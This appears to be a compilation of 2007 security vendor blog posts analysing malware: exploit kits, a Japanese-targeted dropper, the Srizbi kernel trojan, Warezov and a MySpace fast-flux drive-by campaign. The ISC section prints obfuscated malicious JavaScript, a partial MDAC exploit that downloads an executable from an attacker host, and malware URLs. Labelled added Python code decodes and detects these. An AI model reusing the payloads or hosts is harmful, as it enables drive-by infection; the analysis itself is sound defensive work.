June 2007 - Posts

 

The 404 story

June 28th, 2007 by Roberto Tayag

We received reports of a kit hosted on a website which, on access, redirects you to a malicious one. The site hosts several exploits whose ultimate goal is to download the file vers.php, which is in reality an executable that Trend Micro detects as TROJ_MURLO.AW. We have eight files from this kit on our hands. Below are bits of information about each file.

n404-0 is an obfuscated script. It is probably a test by the author, because it only displays the deobfuscated, unencrypted contents of the file n404-1 in a message box.

n404-1 tries to download the file vers.php, which is in reality a Win32 executable. The file is executed as ieupdate3r.exe. It is a downloader that fetches a bunch of further files. Trend Micro already detects some of them, such as TROJ_SPAMBOT.B, TROJ_AGENT.USE and TROJ_WOPLA.DX; the others are detected generically as possible_nucrp-3. vers.php itself is currently detected as TROJ_MURLO.AW.

n404-2 works just like n404-1 but uses a different approach. It also downloads TROJ_MURLO.AW.

n404-3 is a setSlice (WebViewFolderIcon) exploit, detected as EXPL_SSLICE.GEN. This file also tries to download TROJ_MURLO.AW.

n404-4 is not detected yet, but according to logs it is related to MS bulletin MS06-006, the Windows Media Player plug-in vulnerability affecting non-IE browsers. This one also tries to download TROJ_MURLO.AW.

n404-5 is a possible Phel variant, but it seems to do no harm at present. It can probably be edited to the attacker's specification, perhaps for sale later in the game. This is also plausible because the file is not launched by version.php.

n404-6 is detected as EXPL_TXTRANGE.A (the IE createTextRange exploit).

n404-7 is detected by Trend Micro as EXPL_IFRAMEBO.A (an IE IFRAME buffer overflow exploit); this one still points to vers.php, which is TROJ_MURLO.AW.

All of the exploits above can be found within the site. However, only n404-1, n404-2, n404-3 and n404-7 are launched directly when you are redirected to the malicious site.



Source: The 404 story -  TrendLabs | Malware Blog - by Trend Micro

 

Banzai! Trojan Goes (for) Japanese

June 28th, 2007 by Dianne Lagrimas

Lhaca, a Japanese archiving application, reportedly has a vulnerability in the way it handles decompression of files. A malware author has now jumped on this flaw and released TROJ_LHDROPPER.A.

When this software flaw is successfully exploited, the Trojan drops and executes a backdoor detected by Trend Micro as BKDR_AGENT.AANE, and the backdoor's malicious routines are then exhibited on the affected system. It also drops an LZH file (the extension used by the archiving application), which in turn opens a blank MS PowerPoint file. This action hides the Trojan's malicious routines.

The file name translates to "Event Plan for Fiscal Year 2007".

This Trojan affects Windows systems with the Japanese language pack and the archiving software installed.

This malware reinforces the trend of threats targeting specific groups or regions, in this case Japanese computer systems. This attack follows the same path as another Trojan detected in the wild late last month. Detected by Trend Micro as TROJ_PDROPPER.BA, it exploits a known Microsoft vulnerability and also displays a PowerPoint file in the same vein as TROJ_LHDROPPER.A.

The text within the PPT translates to "Status: Taiwan Situation (June 1, 2007: Support Members Debrief Session) Japan Interchange Association, Taipei Office".

TROJ_PDROPPER.BA also drops a backdoor (BKDR_EMBED.W).

As of this writing, no patches have been issued by the vendor for the flaw exploited by TROJ_LHDROPPER.A. Trend Micro strongly recommends not opening files from untrusted sources.

Source: Banzai! Trojan Goes (for) Japanese -  TrendLabs | Malware Blog - by Trend Micro

 

Spam from the Kernel: Full-Kernel Malware Installed by MPack

In the past few weeks, we have observed many Web sites that have been compromised to distribute browser exploits with the MPack kit. We've tracked many different MPack sources created with the intent of distributing different types of malicious code. So far we've seen the following malware samples installed while surfing sites compromised by MPack:

Trojan.Anserin - a Trojan that steals banking-related information
Trojan.Linkoptimizer.B - a dialer Trojan
Backdoor.IRC.Bot - an IRC bot
Infostealer.Ldpinch – a Trojan that steals account and password information
Trojan.Srizbi – a spam Trojan

These Trojans were already in our malware database, but one we discovered recently, Trojan.Srizbi, is really interesting for some unique features. The Trojan.Srizbi driver (windbg48.sys) has two main functions: it hides itself using rootkit techniques and it sends spam. What makes it really unique is that it is probably the first full-kernel malware spotted in the wild.

Once the Trojan is installed it works without any user-mode payload and does everything from kernel mode, including sending spam. The rootkit code is not new: the malicious driver attaches itself to \FileSystem\Ntfs to hide files on the local disk and patches the system service descriptor table (SSDT) to hide registry keys, in the same manner older rootkits did before. The Trojan also attempts to delete %System%\Minidump log files and seems to include a special routine to uninstall competitor rootkits such as "wincom32.sys" and "ntio256.sys".

The most interesting code is the spam routine. Using network functionality directly from kernel mode is much more complicated, and the many rootkit threats we have seen in the past (Haxdoor, Rustock and Peacomm, for example) always carried a user-mode payload that gets injected into some Windows process. Trojan.Srizbi moves a step forward by working entirely in kernel mode, without the need to inject anything into user mode. To manipulate the network connection directly from kernel mode it attaches to the NDIS and TCP/IP drivers and resolves all the Ndis* and Zw* functions it needs, which is unique to this threat. This technique also lets the Trojan bypass firewall and sniffer tools and hide all of its network activity.

We’ve seen the Trojan downloading a zip file from the srihopa.biz domain, which contains the following configuration files for spam:
000_data2 (mail server domains)
001_ncommall (list of names)
002_senderna (list of possible sender names)
003_sendersu (list of possible sender surnames)
config (main spam configuration file)
message (HTML message to spam)
mlist (recipients mail addresses)
mxdata (MX record data)


We think this sample is still in a “beta” stage and it’s not finished yet but users can still find some evidence of the infection by searching for the following registry entry (not hidden):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RcpApi\"MachineNum" = "[SIX RANDOM DIGITS-SIX RANDOM DIGITS-TWO RANDOM DIGITS]"

We guess that the author of Trojan.Srizbi could be the same as Rustock's, because the polymorphic code used in Trojan.Srizbi is very similar to the Backdoor.Rustock.B packer, but more advanced.

As my colleague Elia mentioned previously, we'll undoubtedly see new versions of this malware again.

Posted by Kaoru Hayashi on July 7, 2007 07:11 PM

Source: Symantec Security Response Weblog: Spam from the Kernel: Full-Kernel Malware Installed by MPack

 

Analyst's Diary

 

A green grin

Costin
June 28, 2007 | 09:58  GMT


Earlier today we intercepted a number of mailings with a new Warezov downloader. The good news is that it's already detected as Email-Worm.Win32.Warezov.pk, which we added to our database two days ago.

What's interesting about the mails is that along with the usual executable (which in this case is called "access.exe"), the messages have a couple of PDFs attached.

The PDFs, which are otherwise harmless, contain alleged financial transactions. Here's an example:

If you get tricked by these and get to run the executable, it will contact kitinjderunhadsun.com and download another executable from there. This second exe is 91095 bytes in size, and we detect it as Email-Worm.Win32.Warezov.iq.

We detected the first version of Warezov almost one year ago and after all this time, the gang behind these worms is still roaming free. I'm really looking forward to the day they get caught.

Source: Viruslist.com - Analyst's Diary

 

Zero Day Threats: Part 3.5 (addendum to part 3)

Wednesday June 27, 2007 at 6:31 pm CST
Posted by Craig Schmugar


This is just a quick update to clarify a couple points and respond to some comments / posts I’ve read on the matter.

First off, the definition:

The public availability of exploit information on the same day that a vulnerability is publicly disclosed.

So what’s wrong with this definition?  Well, someone can exploit an unknown and unpatched vulnerability to attack someone else, without any public disclosure or even knowledge.  This is true.  Of course, without being aware of the details (or even existence) one could not validate and label the threat as a zero day.  But after you have this information my simple definition is satisfied.  In other words, a zero day is not a zero day until it’s a zero day.

Another likely point of contention is the inclusion of the word public.  Public is included for the specific reason of dismissing vulnerabilities and exploits that are privately reported to the vendor; and without the term being included, virtually all vulnerabilities shared with anyone are zero days, including those found by the vendor themselves.

While it is not perfect, I do think it’s a good–simple–general purpose definition.

Second, the inclusion of low-risk vulnerabilities in the stats, such as those limited to local denial of service:

I didn’t make assumptions as to the motivations of those who disclosed zero day information.  If someone was out to create a headache for Microsoft by generating more work or publicity at “a bad time” they might strategically release their DoS-only exploit around Patch Tuesday.

Clearly a vulnerability that allows for arbitrary code execution is significantly more critical, and valuable, than something that is limited to DoS.  Many vulnerabilities are reported as DoS, which may potentially be exploitable (allow for remote code execution).  It can take significantly more effort to confirm code execution and, depending on the motivation of the reporter, they may not make the effort.  You have cases where some vulnerabilities may or may not be limited to DoS.

So for the sake of the blog, I did not discount any vulnerability types.  FWIW, here's a breakdown restricted to threats categorized as remote code execution that were discovered/disclosed within ±3 days of Patch Tuesday.

  • 2005   0% (8)
  • 2006 41% (40)
  • 2007 30% (10) as of April 15

As I stated in my previous post, the dates associated with threats discovered through active exploitation are unreliable.

Third, “Exploit Wednesday”

My post really didn’t cover this.  Exploit Wednesday is less about malicious attackers sitting on exploits until the day after Patch Tuesday, and more a result of those who previously, and responsibly, reported a vulnerability to Microsoft and then waited until Patch Tuesday before going public.  After Microsoft releases a patch, they then disclose enough details that allow for the creation of an exploit.  Another factor is those who reverse engineer the patch to discover the vulnerability and then write, and release, an exploit.

The 4th and final part of this blog series is in the works.

Source: Computer Security Research - McAfee Avert Labs Blog

 

UPDATE!  2007-06-28

MySpace Phish/Drive-by attack vector propagating Fast Flux network growth

Two primary infection vectors have been observed providing us with unique insight into the life cycle involved in propagating a fast flux service network.  The attack vectors include:

  • Compromised MySpace Member profiles redirecting to phishing sites (this has been discussed here)
  • Malicious redirection by SWF Flash "images" to a phishing site and drive-by browser exploit attempt.

All Flash redirects were observed redirecting browsers to http://www.e44 7aa2.com    (****CAREFUL****)
( e447aa2.com is a domain currently serviced by this flux network with wildcard DNS resolution )

$ GET http://www.e44 7aa2.com

<HTML>
<HEAD>
<meta http-equiv="refresh" content="1;url=http://login.my space.cfm.fuseaction.splash.myto ken.76701a26.da3e.44a3a17b.e44 7aa2.com/da3e/index.php" />
</HEAD>
</HTML>

(The above URL is only a single example of potentially infinite permutations)

Following the above /da3e/index.php link results in a credible-looking MySpace landing page (served in flux) with the most interesting footer element shown below:

<!-- onRequestEnd -->
<script>window.status="Done"</script><iframe src="
../.footer_01.gif" width=0 height=0></iframe>

 The IFrame rendered /.footer_01.gif (not an actual gif but instead an encoded/obfuscated JavaScript snippet)

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%6
6%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%
72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B
%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 The decoded result of the above /.footer_01.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/header_03.gif" width=1 height=1></iframe>
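To make the two eval(unescape(...)) stages above concrete, here is an added Python re-implementation (example code, not part of the ISC diary or of the attacker's kit). The first unescape() yields the function d(s), which walks its argument backwards, skips the first character (the %08), XORs every remaining character code with 2 and document.write()s the result. STAGE1 and PAYLOADS are copied from the /.footer_01.gif listing above (line breaks removed, the JavaScript \" written as a plain quote); the find_iframe_srcs() helper is my own addition for pulling the next-stage URL out of the decoded HTML.

```python
import re

# Stage 1 of /.footer_01.gif as listed above: the percent-encoded decoder, line breaks removed.
STAGE1 = (
    "%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29"
    "%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B"
    "%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72"
    "%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28"
    "%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D"
    "%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B"
    "%74%29%7D"
)

# The two d(unescape(...)) arguments from the same listing (the JavaScript \" is just a quote).
PAYLOADS = [
    "%08<vrkpaq-> glmF ?qwvcvq,umflku<vrkpaq>",
    '%08<gocpdk-><3?vjekgj"3?jvfku" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq"gocpdk>',
]

PERCENT = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    """Emulate the legacy JavaScript unescape(): %uXXXX and %XX become single characters."""
    return PERCENT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_stage2(payload, key=2):
    """Re-implement d(s): from the last character down to index 1, XOR each char code with 2.

    d() also buffers its output in 80-character chunks before document.write(); that only
    changes how the string is assembled, not its content, so the chunking is skipped here.
    """
    s = js_unescape(payload)
    return "".join(chr(ord(c) ^ key) for c in reversed(s[1:]))


def decode_footer(payloads):
    """What the victim's browser ends up writing into the page: all stages concatenated."""
    return "".join(decode_stage2(p) for p in payloads)


# Added helper (not from the diary): tolerate the line break the kit puts right after src=".
IFRAME_SRC = re.compile(r'<iframe[^>]*?src="\s*([^"]+?)\s*"', re.I | re.S)


def find_iframe_srcs(html):
    """Return the src of every iframe in the decoded HTML, i.e. the next stage to fetch."""
    return [m.group(1) for m in IFRAME_SRC.finditer(html)]


if __name__ == "__main__":
    print(js_unescape(STAGE1))          # the decoder function d(s)
    html = decode_footer(PAYLOADS)
    print(html)                         # window.status line plus the 1x1 iframe
    print(find_iframe_srcs(html))       # ['http://fafb4c4c.com/header_03.gif']
```

Decoded, the two stages give the window.status line and the 1x1 iframe pointing at /header_03.gif, matching the decoded result shown above. The /header_03.gif and /routine.php stages appear to use the same decoder with different payloads, so decode_stage2() applies to them unchanged once their percent-encoded strings are recovered from the page.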

 The IFrame rendered /header_03.gif (served in flux) results in another JavaScript encoded/obfuscated file:

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74

REMOVED

?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E%63%74%

REMOVED

dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>

 For which the decoded result of the above /header_03.gif is:

<script>window.status="Done"</script>
<iframe src="
http://fafb 4c4c.com/routine.php" width=1 height=1></iframe>

Following the IFrame rendered /routine.php file results in another JavaScript encoded/obfuscated file:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Routine Session ID: ca0910cWc01bT69aeA7e3030d1f52a45</title>

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

\"lpwvgp%08y\"+*pmppGgnflcj\"lmkvalwd%08< vrkpaqctch-vzgv?gr{v\"vrkpaq>"));
</SCRIPT>        

<SCRIPT Language="JavaScript">
eval(unescape("%66%75%6E

REMOVED

-> glmF ?qwvcvq,umflku<vrkpaq>"));
</SCRIPT>
</head>

<body onload="doesnotexist()">
<SCRIPT Language="JavaScript">
eval(unescape("

REMOVED

"));
</SCRIPT>
</body>
</html>

The decoded result of /routine.php is an attempt to exploit vulnerable IE browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014), for which Microsoft released a patch in April 2006.

<script type="text/javascript">
function handleError() {
return true;
}
window.onerror = handleError;
</script>

<script>window.status="Done"</script>
<SCRIPT language="VBScript">
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0  Then
REMOVED
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "
GET","http://fafb 4c4c.com/session.exe",False
obj_msxml2.send
REMOVED
End If
</SCRIPT>

The successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub (session.exe), which then attempts to download the additional malicious components needed to integrate the newly compromised host into a fast flux service network.

The malware stub (session.exe) above attempts to download and execute the following components:

http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe
http://fcs.camgenie .com/weby7.exe

Now back to these Evil Flash File Redirects:

What follows is just a representative sampling of URLs for Flash files hosted on imageshack.us which perform one simple action: an ActionScript-based browser redirect to a fast flux service network hosting a combined phishing page and drive-by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014).

All of the files are identical; every one of them has the same MD5 and SHA1 hashes:

MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740

The mtime maintained by the ImageShack HTTP server suggests a deployment time of 2007-06-05 03:56:30-0700.

Decompiling a flash component results in the discovery of that terrible redirect:

$ swfdump -atp ./img527.imageshack.us/img527/3530/38023350se6.swf
[HEADER]        File version: 8
[HEADER]        File size: 98
[HEADER]        Frame rate: 120.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c]        28 DOACTION
                 (   24 bytes) action: GetUrl URL:"http://www.e447 aa2.com" Label:""
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
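The swfdump listing above shows what the redirect looks like. As an added example that is not part of the diary (and not a dump of the ImageShack file, whose hash is given above), here is a minimal Python SWF walker that finds the same thing without swftools: it skips the bit-packed RECT, iterates the tag stream and pulls the URL out of every ActionGetURL (0x83) record inside a DoAction (tag 12). build_sample_swf() constructs a 1x1 pixel, one-frame SWF carrying only that action, so the tag sizes it produces match the listing (24-byte GetUrl, 28-byte DOACTION), but its bytes are an assumption, not the original file; its tag() helper only writes short-form tag headers (bodies under 63 bytes).

```python
import struct
import zlib

DO_ACTION, END_TAG = 12, 0
ACTION_GET_URL = 0x83


def read_tag(data, pos):
    """RECORDHEADER: u16 LE, upper 10 bits tag code, lower 6 bits length (0x3F: u32 length follows)."""
    code_len, = struct.unpack_from("<H", data, pos)
    pos += 2
    code, length = code_len >> 6, code_len & 0x3F
    if length == 0x3F:
        length, = struct.unpack_from("<I", data, pos)
        pos += 4
    return code, data[pos:pos + length], pos + length


def iter_tags(data):
    """Yield (code, body) for every tag; accepts uncompressed FWS and zlib-compressed CWS files."""
    sig = data[:3]
    if sig == b"CWS":
        data = data[:8] + zlib.decompress(data[8:])   # 8-byte header stays in the clear
    elif sig != b"FWS":
        raise ValueError("not an SWF file")
    pos = 8                                  # signature(3) + version(1) + file length(4)
    nbits = data[pos] >> 3                   # RECT: 5-bit field width, then four fields
    pos += (5 + 4 * nbits + 7) // 8          # RECT is bit-packed and byte-aligned at its end
    pos += 4                                 # frame rate (8.8 fixed) + frame count
    while pos + 2 <= len(data):
        code, body, pos = read_tag(data, pos)
        yield code, body
        if code == END_TAG:
            break


def get_urls_from_actions(body):
    """Walk ActionScript 2 action records; codes >= 0x80 carry a u16 length and a payload."""
    urls, i = [], 0
    while i < len(body):
        code = body[i]
        i += 1
        if code == 0:                # ActionEnd
            break
        if code < 0x80:              # single-byte action, no payload
            continue
        length, = struct.unpack_from("<H", body, i)
        i += 2
        payload = body[i:i + length]
        i += length
        if code == ACTION_GET_URL:   # payload = url\0 target\0
            url, _, _ = payload.partition(b"\x00")
            urls.append(url.decode("latin-1"))
    return urls


def swf_get_urls(data):
    """Every URL an ActionGetURL in the file would send the browser to."""
    urls = []
    for code, body in iter_tags(data):
        if code == DO_ACTION:
            urls.extend(get_urls_from_actions(body))
    return urls


def build_sample_swf(url, compress=False):
    """Constructed 1x1 px, one-frame SWF whose only script is GetUrl(url), not the ImageShack file."""
    def tag(code, body):             # short-form header only (body shorter than 63 bytes)
        return struct.pack("<H", (code << 6) | len(body)) + body

    get_url = url.encode("latin-1") + b"\x00" + b"\x00"   # URL + empty target window
    actions = bytes([ACTION_GET_URL]) + struct.pack("<H", len(get_url)) + get_url + b"\x00"
    body = (
        b"\x28\x28\x0a\x00"                      # RECT nbits=5: 0..20 twips (1 px) in x and y
        + struct.pack("<HH", 120 << 8, 1)        # 120.0 fps, 1 frame
        + tag(69, b"\x00" * 4)                   # FILEATTRIBUTES
        + tag(9, b"\xff\xff\xff")                # SETBACKGROUNDCOLOR (ff/ff/ff)
        + tag(DO_ACTION, actions)                # DOACTION: GetUrl + End, 28 bytes as in swfdump
        + tag(1, b"")                            # SHOWFRAME
        + tag(END_TAG, b"")                      # END
    )
    header = b"\x08" + struct.pack("<I", 8 + len(body))   # version 8, uncompressed length
    if compress:
        return b"CWS" + header + zlib.compress(body)
    return b"FWS" + header + body


if __name__ == "__main__":
    sample = build_sample_swf("http://www.e447aa2.com")
    for code, body in iter_tags(sample):
        print(f"[{code:03x}] {len(body):>4}")
    print(swf_get_urls(sample))
```

Run against a real file with swf_get_urls(open(path, "rb").read()); a 1x1 "image" whose only code is a GetUrl to a domain unrelated to the hosting site is the signature of the redirects the diary describes.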
 

Where in the world are Flash files like the above being hosted?

http://img116.imagesh ack.us/img116/1299/97231039qx0.swf
http://img116.imagesh ack.us/img116/1424/81562934sa1.swf
http://img116.imagesh ack.us/img116/1699/63088115dg4.swf

REMOVED >100 URLS ( You get the idea )

http://img527.imagesh ack.us/img527/9186/77432798oc4.swf
http://img527.imagesh ack.us/img527/9573/87356429cb0.swf
http://img527.imagesh ack.us/img527/9696/66658005sg8.swf
http://img527.imagesh ack.us/img527/9828/13582837lk5.swf

Several hundred MySpace profiles were discovered injected with links to phishing pages, and it is easy to imagine that many more were affected.

home.myspace.com.index.cfm.fusea ction.user.mytoken.0c38outb.h5v 17lt.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0en0r8xd.1155 34a.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.0l3ttn77.oqr hldv.com

HUNDREDS OF URLS REMOVED

home.myspace.com.index.cfm.fusea ction.user.mytoken.1wr4sm8c.lw h gvcq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.257k51r.uhq0 1o6.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dd2l3w6.gcp 8tr9.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.2dp2cvwv.at6 pyss.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.304165k.xt3c gyq.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3gcri4jk.jk33v 96.com
home.myspace.com.index.cfm.fusea ction.user.mytoken.3kuto9a4.de0 82ak.com

Flux!  It's SO easy to miss!

This write up is not geared to address the more complex overview of what a fast flux service network is (but is forthcoming).  Essentially all URLs involved in this fast flux service network are served by compromised hosts redirecting their HTTP and DNS traffic to another upstream Mothership host. 

;; ANSWER SECTION:
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]

Check back on the above DNS results; the same goes for any of the domains referenced above. The concept of Flux may unfold before your very eyes.

;; AUTHORITY SECTION:
at6pyss.com.            172799  IN      NS      ns1.welcometothechallenge.hk.
at6pyss.com.            172799  IN      NS      ns1.kanjerida.hk.
at6pyss.com.            172799  IN      NS      ns1.phudisarida.hk.
at6pyss.com.            172799  IN      NS      ns1.myheroisyourslove.hk.
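As an added example (not from the ISC diary), here is a Python scoring routine for dig output like the above. It parses the ANSWER SECTION lines, measures the three properties that make a flux service network stand out (a TTL of a few minutes, many A records for one name, spread across unrelated networks with consumer-broadband reverse names) and compares two lookups to see how much of the address set rotated. SNAPSHOT_1 is the answer listed above; SNAPSHOT_2, STABLE_CONTROL, the /16 grouping used as a stand-in for provider diversity and the thresholds are constructed assumptions.

```python
import ipaddress
import re

# The ANSWER SECTION for at6pyss.com exactly as listed above (reverse names in brackets).
SNAPSHOT_1 = """\
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       67.190.48.71 [c-67-190-48-71.hsd1.co.comcast.net]
at6pyss.com.            179     IN      A       70.241.113.51 [adsl-70-241-113-51.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       70.250.117.30 [ppp-70-250-117-30.dsl.hstntx.swbell.net]
at6pyss.com.            179     IN      A       71.140.90.107 [ppp-71-140-90-107.dsl.frs2ca.pacbell.net]
at6pyss.com.            179     IN      A       71.146.88.77 [adsl-71-146-88-77.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       71.146.144.141 [adsl-71-146-144-141.dsl.pltn13.sbcglobal.net]
at6pyss.com.            179     IN      A       75.31.235.68 [adsl-75-31-235-68.dsl.chcgil.sbcglobal.net]
at6pyss.com.            179     IN      A       76.80.255.40 [cpe-76-80-255-40.socal.res.rr.com]
"""

# Constructed: a second lookup a few minutes later in which only two of the ten hosts survive.
SNAPSHOT_2 = """\
at6pyss.com.            179     IN      A       206.255.81.68 [h68.81.255.206.cable.htsp.cablelynx.com]
at6pyss.com.            179     IN      A       67.161.240.98 [c-67-161-240-98.hsd1.ut.comcast.net]
at6pyss.com.            179     IN      A       24.10.1.5 [constructed-1.dsl.example.net]
at6pyss.com.            179     IN      A       68.50.2.9 [constructed-2.cable.example.net]
at6pyss.com.            179     IN      A       71.200.3.7 [constructed-3.dsl.example.net]
at6pyss.com.            179     IN      A       72.130.4.1 [constructed-4.ppp.example.net]
at6pyss.com.            179     IN      A       73.160.5.2 [constructed-5.dsl.example.net]
at6pyss.com.            179     IN      A       74.100.6.3 [constructed-6.cable.example.net]
at6pyss.com.            179     IN      A       96.20.7.4 [constructed-7.dsl.example.net]
at6pyss.com.            179     IN      A       98.200.8.5 [constructed-8.ppp.example.net]
"""

# Constructed control: a long-TTL, two-address answer that must not be flagged.
STABLE_CONTROL = """\
www.example.com.        3600    IN      A       93.184.216.34
www.example.com.        3600    IN      A       93.184.216.35
"""

A_RECORD = re.compile(
    r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+A\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
    r"(?:\s+\[(?P<rdns>[^\]]*)\])?"
)
# Substrings typical of residential broadband reverse names (assumed list, extend as needed).
CONSUMER_HINT = re.compile(r"dsl|cable|ppp|hsd1|cpe|dialup|dyn|pool", re.I)


def parse_answer(text):
    """Turn dig-style 'name TTL IN A ip [rdns]' lines into dicts; other lines are ignored."""
    recs = []
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            recs.append({"ttl": int(m["ttl"]), "ip": m["ip"], "rdns": m["rdns"] or ""})
    return recs


def flux_score(recs, ttl_max=300, min_hosts=5, min_nets=3):
    """Flag an answer as flux-like: short TTL, many hosts, spread over many unrelated /16s."""
    ips = {r["ip"] for r in recs}
    nets = {str(ipaddress.ip_network(ip + "/16", strict=False)) for ip in ips}
    consumer = sum(1 for r in recs if CONSUMER_HINT.search(r["rdns"]))
    ttl = min(r["ttl"] for r in recs)
    return {
        "ttl": ttl, "hosts": len(ips), "nets": len(nets), "consumer_rdns": consumer,
        "flux": ttl <= ttl_max and len(ips) >= min_hosts and len(nets) >= min_nets,
    }


def churn(recs_a, recs_b):
    """Fraction of the combined address set that differs between two lookups (1.0 = all new)."""
    a, b = {r["ip"] for r in recs_a}, {r["ip"] for r in recs_b}
    return 1.0 - len(a & b) / len(a | b)


if __name__ == "__main__":
    first, second = parse_answer(SNAPSHOT_1), parse_answer(SNAPSHOT_2)
    print(flux_score(first))
    print("churn between lookups:", round(churn(first, second), 3))
    print(flux_score(parse_answer(STABLE_CONTROL)))
```

A single lookup already scores as flux here (TTL 179, ten hosts in nine different /16s, all with broadband-looking reverse names); re-querying after the TTL expires and feeding both answers to churn() is what turns the suspicion into the rotation the diary tells you to watch for.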

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Published: 2007-06-28,
Last Updated: 2007-06-28 23:33:56 UTC
by Lorna Hutcheson (Version: 2)

